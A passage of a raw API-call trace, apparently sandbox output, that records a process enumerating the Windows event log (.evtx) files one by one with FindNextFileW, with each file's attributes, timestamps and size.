hFindFile=0x3947be8, lpFindFileData=0x385fa7c | out: lpFindFileData=0x385fa7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcbb7386e, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xcbb7386e, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1df92a8, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0xe84, dwReserved1=0xffffcb96, cFileName="Microsoft-Windows-LiveId%4Operational.evtx", cAlternateFileName="MI4C58~1.EVT")) returned 1 [0286.405] FindNextFileW (in: hFindFile=0x3947be8, lpFindFileData=0x385fa7c | out: lpFindFileData=0x385fa7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc93d06f0, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xc93d06f0, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1df92a8, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0xe84, dwReserved1=0xffffcb96, cFileName="Microsoft-Windows-MUI%4Admin.evtx", cAlternateFileName="MI30D3~1.EVT")) returned 1 [0286.405] FindNextFileW (in: hFindFile=0x3947be8, lpFindFileData=0x385fa7c | out: lpFindFileData=0x385fa7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc93aa49b, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xc93aa49b, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xd96d7ac9, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0xe84, dwReserved1=0xffffcb96, cFileName="Microsoft-Windows-MUI%4Operational.evtx", cAlternateFileName="MI6F01~1.EVT")) returned 1 [0286.405] FindNextFileW (in: hFindFile=0x3947be8, lpFindFileData=0x385fa7c | out: lpFindFileData=0x385fa7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc9d33b19, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xc9d33b19, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1dd3053, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0xe84, dwReserved1=0xffffcb96, cFileName="Microsoft-Windows-NCSI%4Operational.evtx", cAlternateFileName="MI483C~1.EVT")) returned 1 [0286.405] FindNextFileW (in: hFindFile=0x3947be8, lpFindFileData=0x385fa7c | out: lpFindFileData=0x385fa7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcbcf0ff2, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xcbcf0ff2, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1dd3053, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0xe84, dwReserved1=0xffffcb96, cFileName="Microsoft-Windows-NetworkProfile%4Operational.evtx", cAlternateFileName="MIFC66~1.EVT")) returned 1 [0286.405] FindNextFileW (in: hFindFile=0x3947be8, lpFindFileData=0x385fa7c | out: lpFindFileData=0x385fa7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x50ab3154, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x50ab3154, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xd96d7ac9, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0xe84, dwReserved1=0xffffcb96, cFileName="Microsoft-Windows-Ntfs%4Operational.evtx", cAlternateFileName="MI6E98~1.EVT")) returned 1 [0286.405] FindNextFileW (in: hFindFile=0x3947be8, lpFindFileData=0x385fa7c | out: lpFindFileData=0x385fa7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x50ad9393, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x50ad9393, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xd96d7ac9, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0xe84, dwReserved1=0xffffcb96, cFileName="Microsoft-Windows-Ntfs%4WHC.evtx", cAlternateFileName="MIB2AC~1.EVT")) returned 1 [0286.406] FindNextFileW (in: hFindFile=0x3947be8, lpFindFileData=0x385fa7c | out: lpFindFileData=0x385fa7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca5fe5cb, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xca5fe5cb, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1dd3053, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0xe84, dwReserved1=0xffffcb96, cFileName="Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx", cAlternateFileName="MI6AFE~1.EVT")) returned 1 [0286.406] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x4d0998, Size=0x4000) returned 0x4014d58 [0286.406] FindNextFileW (in: hFindFile=0x3947be8, lpFindFileData=0x385fa7c | out: lpFindFileData=0x385fa7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe24cdef0, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xe24cdef0, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1dd3053, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0xe84, dwReserved1=0xffffcb96, cFileName="Microsoft-Windows-ReadyBoost%4Operational.evtx", cAlternateFileName="MIB9D2~1.EVT")) returned 1 [0286.406] FindNextFileW (in: hFindFile=0x3947be8, lpFindFileData=0x385fa7c | out: lpFindFileData=0x385fa7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd125335f, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xd125335f, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xd96d7ac9, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0xe84, dwReserved1=0xffffcb96, cFileName="Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx", cAlternateFileName="MI7A67~1.EVT")) returned 1 [0286.406] FindNextFileW (in: hFindFile=0x3947be8, lpFindFileData=0x385fa7c | out: lpFindFileData=0x385fa7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd1fe2941, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xd1fe2941, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xd96d7ac9, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x101000, dwReserved0=0xe84, dwReserved1=0xffffcb96, cFileName="Microsoft-Windows-SettingSync%4Debug.evtx", cAlternateFileName="MI3773~1.EVT")) returned 1 [0286.407] FindNextFileW (in: hFindFile=0x3947be8, lpFindFileData=0x385fa7c | out: lpFindFileData=0x385fa7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd1fe2941, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xd1fe2941, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1dd3053, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0xe84, dwReserved1=0xffffcb96, cFileName="Microsoft-Windows-SettingSync%4Operational.evtx", cAlternateFileName="MI36AA~1.EVT")) returned 1 [0286.407] FindNextFileW (in: hFindFile=0x3947be8, lpFindFileData=0x385fa7c | out: lpFindFileData=0x385fa7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd3852b12, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xd3852b12, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1dd3053, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0xe84, dwReserved1=0xffffcb96, cFileName="Microsoft-Windows-Shell-Core%4ActionCenter.evtx", cAlternateFileName="MI2E2E~1.EVT")) returned 1 [0286.407] FindNextFileW (in: hFindFile=0x3947be8, lpFindFileData=0x385fa7c | out: lpFindFileData=0x385fa7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd3852b12, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xd3852b12, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xd96d7ac9, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0xe84, dwReserved1=0xffffcb96, cFileName="Microsoft-Windows-Shell-Core%4Operational.evtx", cAlternateFileName="MI1C6C~1.EVT")) returned 1 [0286.407] FindNextFileW (in: hFindFile=0x3947be8, lpFindFileData=0x385fa7c | out: lpFindFileData=0x385fa7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc97d66c8, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xc97d66c8, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xd96d7ac9, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0xe84, dwReserved1=0xffffcb96, cFileName="Microsoft-Windows-SmbClient%4Connectivity.evtx", cAlternateFileName="MI00FB~1.EVT")) returned 1 [0286.407] FindNextFileW (in: hFindFile=0x3947be8, lpFindFileData=0x385fa7c | out: lpFindFileData=0x385fa7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc97b042f, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xc97b042f, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1dd3053, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0xe84, dwReserved1=0xffffcb96, cFileName="Microsoft-Windows-SMBClient%4Operational.evtx", cAlternateFileName="MID8B0~1.EVT")) returned 1 [0286.407] FindNextFileW (in: hFindFile=0x3947be8, lpFindFileData=0x385fa7c | out: lpFindFileData=0x385fa7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc97d66c8, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xc97d66c8, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1dd3053, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0xe84, dwReserved1=0xffffcb96, cFileName="Microsoft-Windows-SmbClient%4Security.evtx", cAlternateFileName="MI8CEE~1.EVT")) returned 1 [0286.408] FindNextFileW (in: hFindFile=0x3947be8, lpFindFileData=0x385fa7c | out: lpFindFileData=0x385fa7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcb1ea1c9, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xcb1ea1c9, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1dd3053, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0xe84, dwReserved1=0xffffcb96, cFileName="Microsoft-Windows-SMBServer%4Audit.evtx", cAlternateFileName="MIE3AD~1.EVT")) returned 1 [0286.408] FindNextFileW (in: hFindFile=0x3947be8, lpFindFileData=0x385fa7c | out: lpFindFileData=0x385fa7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcb19dd19, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xcb19dd19, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1dd3053, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0xe84, dwReserved1=0xffffcb96, cFileName="Microsoft-Windows-SMBServer%4Connectivity.evtx", cAlternateFileName="MI8248~1.EVT")) returned 1 [0286.408] FindNextFileW (in: hFindFile=0x3947be8, lpFindFileData=0x385fa7c | out: lpFindFileData=0x385fa7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcb151873, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xcb151873, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xd96d7ac9, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0xe84, dwReserved1=0xffffcb96, cFileName="Microsoft-Windows-SMBServer%4Operational.evtx", cAlternateFileName="MI4B6B~1.EVT")) returned 1 [0286.409] FindNextFileW (in: hFindFile=0x3947be8, lpFindFileData=0x385fa7c | out: lpFindFileData=0x385fa7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcb177aca, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xcb177aca, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1dd3053, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0xe84, dwReserved1=0xffffcb96, cFileName="Microsoft-Windows-SMBServer%4Security.evtx", cAlternateFileName="MI7709~1.EVT")) returned 1 [0286.409] FindNextFileW (in: hFindFile=0x3947be8, lpFindFileData=0x385fa7c | out: lpFindFileData=0x385fa7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd751ea61, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xd751ea61, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1dd3053, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0xe84, dwReserved1=0xffffcb96, cFileName="Microsoft-Windows-Store%4Operational.evtx", cAlternateFileName="MICEDD~1.EVT")) returned 1 [0286.409] FindNextFileW (in: hFindFile=0x3947be8, lpFindFileData=0x385fa7c | out: lpFindFileData=0x385fa7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcd0763ff, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xcd0763ff, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xd96d7ac9, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0xe84, dwReserved1=0xffffcb96, cFileName="Microsoft-Windows-TaskScheduler%4Maintenance.evtx", cAlternateFileName="MIE2F0~1.EVT")) returned 1 [0286.409] FindNextFileW (in: hFindFile=0x3947be8, lpFindFileData=0x385fa7c | out: lpFindFileData=0x385fa7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5089d037, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x5089d037, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x95ae023d, ftLastWriteTime.dwHighDateTime=0x1d1a04e, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0xe84, dwReserved1=0xffffcb96, cFileName="Microsoft-Windows-TerminalServices-LocalSessionManager%4Admin.evtx", cAlternateFileName="MIAB1D~1.EVT")) returned 1 [0286.409] FindNextFileW (in: hFindFile=0x3947be8, lpFindFileData=0x385fa7c | out: lpFindFileData=0x385fa7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x508c32a6, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x508c32a6, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xd96d7ac9, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0xe84, dwReserved1=0xffffcb96, cFileName="Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx", cAlternateFileName="MI62D3~1.EVT")) returned 1 [0286.409] FindNextFileW (in: hFindFile=0x3947be8, lpFindFileData=0x385fa7c | out: lpFindFileData=0x385fa7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcc14341c, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xcc14341c, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1dace07, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0xe84, dwReserved1=0xffffcb96, cFileName="Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Admin.evtx", cAlternateFileName="MIEC03~1.EVT")) returned 1 [0286.409] FindNextFileW (in: hFindFile=0x3947be8, lpFindFileData=0x385fa7c | out: lpFindFileData=0x385fa7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcc1b5b23, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xcc1b5b23, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xd96d7ac9, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0xe84, dwReserved1=0xffffcb96, cFileName="Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational.evtx", cAlternateFileName="MI1F5D~1.EVT")) returned 1 [0286.410] FindNextFileW (in: hFindFile=0x3947be8, lpFindFileData=0x385fa7c | out: lpFindFileData=0x385fa7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd74ac348, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xd74ac348, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1dace07, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0xe84, dwReserved1=0xffffcb96, cFileName="Microsoft-Windows-TWinUI%4Operational.evtx", cAlternateFileName="MIA925~1.EVT")) returned 1 [0286.410] FindNextFileW (in: hFindFile=0x3947be8, lpFindFileData=0x385fa7c | out: lpFindFileData=0x385fa7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x50aff605, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x50aff605, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xd96d7ac9, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0xe84, dwReserved1=0xffffcb96, cFileName="Microsoft-Windows-User Profile Service%4Operational.evtx", cAlternateFileName="MI4D4C~1.EVT")) returned 1 [0286.410] FindNextFileW (in: hFindFile=0x3947be8, lpFindFileData=0x385fa7c | out: lpFindFileData=0x385fa7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x50981e6e, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x50981e6e, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x95ae023d, ftLastWriteTime.dwHighDateTime=0x1d1a04e, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0xe84, dwReserved1=0xffffcb96, cFileName="Microsoft-Windows-UserPnp%4ActionCenter.evtx", cAlternateFileName="MI5FF0~1.EVT")) returned 1 [0286.410] FindNextFileW (in: hFindFile=0x3947be8, lpFindFileData=0x385fa7c | out: lpFindFileData=0x385fa7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5095bc04, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x5095bc04, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xd96d7ac9, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0xe84, dwReserved1=0xffffcb96, cFileName="Microsoft-Windows-UserPnp%4DeviceInstall.evtx", cAlternateFileName="MIBD88~1.EVT")) returned 1 [0286.410] FindNextFileW (in: hFindFile=0x3947be8, lpFindFileData=0x385fa7c | out: lpFindFileData=0x385fa7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x50b97f64, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x50b97f64, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xd96d7ac9, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0xe84, dwReserved1=0xffffcb96, cFileName="Microsoft-Windows-VolumeSnapshot-Driver%4Operational.evtx", cAlternateFileName="MICC17~1.EVT")) returned 1 [0286.410] FindNextFileW (in: hFindFile=0x3947be8, lpFindFileData=0x385fa7c | out: lpFindFileData=0x385fa7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc986efe1, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xc986efe1, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xd96d7ac9, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0xe84, dwReserved1=0xffffcb96, cFileName="Microsoft-Windows-Wcmsvc%4Operational.evtx", cAlternateFileName="MI72BF~1.EVT")) returned 1 [0286.411] FindNextFileW (in: hFindFile=0x3947be8, lpFindFileData=0x385fa7c | out: lpFindFileData=0x385fa7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcb426548, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xcb426548, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1dace07, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0xe84, dwReserved1=0xffffcb96, cFileName="Microsoft-Windows-Windows Defender%4Operational.evtx", cAlternateFileName="MI7501~1.EVT")) returned 1 [0286.411] FindNextFileW (in: hFindFile=0x3947be8, lpFindFileData=0x385fa7c | out: lpFindFileData=0x385fa7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcb4729e7, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xcb4729e7, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xd96d7ac9, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0xe84, dwReserved1=0xffffcb96, cFileName="Microsoft-Windows-Windows Defender%4WHC.evtx", cAlternateFileName="MIF226~1.EVT")) returned 1 [0286.411] FindNextFileW (in: hFindFile=0x3947be8, lpFindFileData=0x385fa7c | out: lpFindFileData=0x385fa7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd4b19353, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xd4b19353, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1dace07, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0xe84, dwReserved1=0xffffcb96, cFileName="Microsoft-Windows-Windows Firewall With Advanced Security%4ConnectionSecurity.evtx", cAlternateFileName="MIDCC7~1.EVT")) returned 1 [0286.411] FindNextFileW (in: hFindFile=0x3947be8, lpFindFileData=0x385fa7c | out: lpFindFileData=0x385fa7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc9c9b1b6, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xc9c9b1b6, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1dace07, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x101000, dwReserved0=0xe84, dwReserved1=0xffffcb96, cFileName="Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall.evtx", cAlternateFileName="MI7771~1.EVT")) returned 1 [0286.411] FindNextFileW (in: hFindFile=0x3947be8, lpFindFileData=0x385fa7c | out: lpFindFileData=0x385fa7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc9df26e9, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xc9df26e9, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1dace07, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0xe84, dwReserved1=0xffffcb96, cFileName="Microsoft-Windows-WinINet-Config%4ProxyConfigChanged.evtx", cAlternateFileName="MI4667~1.EVT")) returned 1 [0286.412] FindNextFileW (in: hFindFile=0x3947be8, lpFindFileData=0x385fa7c | out: lpFindFileData=0x385fa7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd122d184, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xd122d184, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1d86ba0, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0xe84, dwReserved1=0xffffcb96, cFileName="Microsoft-Windows-Winlogon%4Operational.evtx", cAlternateFileName="MID6AB~1.EVT")) returned 1 [0286.412] FindNextFileW (in: hFindFile=0x3947be8, lpFindFileData=0x385fa7c | out: lpFindFileData=0x385fa7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcf164b9b, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xcf164b9b, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1d86ba0, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x101000, dwReserved0=0xe84, dwReserved1=0xffffcb96, cFileName="Microsoft-Windows-WMI-Activity%4Operational.evtx", cAlternateFileName="MIFF83~1.EVT")) returned 1 [0286.412] FindNextFileW (in: hFindFile=0x3947be8, lpFindFileData=0x385fa7c | out: lpFindFileData=0x385fa7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x50555c8d, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x50555c8d, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xf9a458f4, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x111000, dwReserved0=0xe84, dwReserved1=0xffffcb96, cFileName="Security.evtx", cAlternateFileName="SECURI~1.EVT")) returned 1 [0286.412] FindNextFileW (in: hFindFile=0x3947be8, lpFindFileData=0x385fa7c | out: lpFindFileData=0x385fa7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x95a6db2c, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x95a6db2c, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1d86ba0, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0xe84, dwReserved1=0xffffcb96, cFileName="Setup.evtx", cAlternateFileName="SETUP~1.EVT")) returned 1 [0286.412] FindNextFileW (in: hFindFile=0x3947be8, lpFindFileData=0x385fa7c | out: 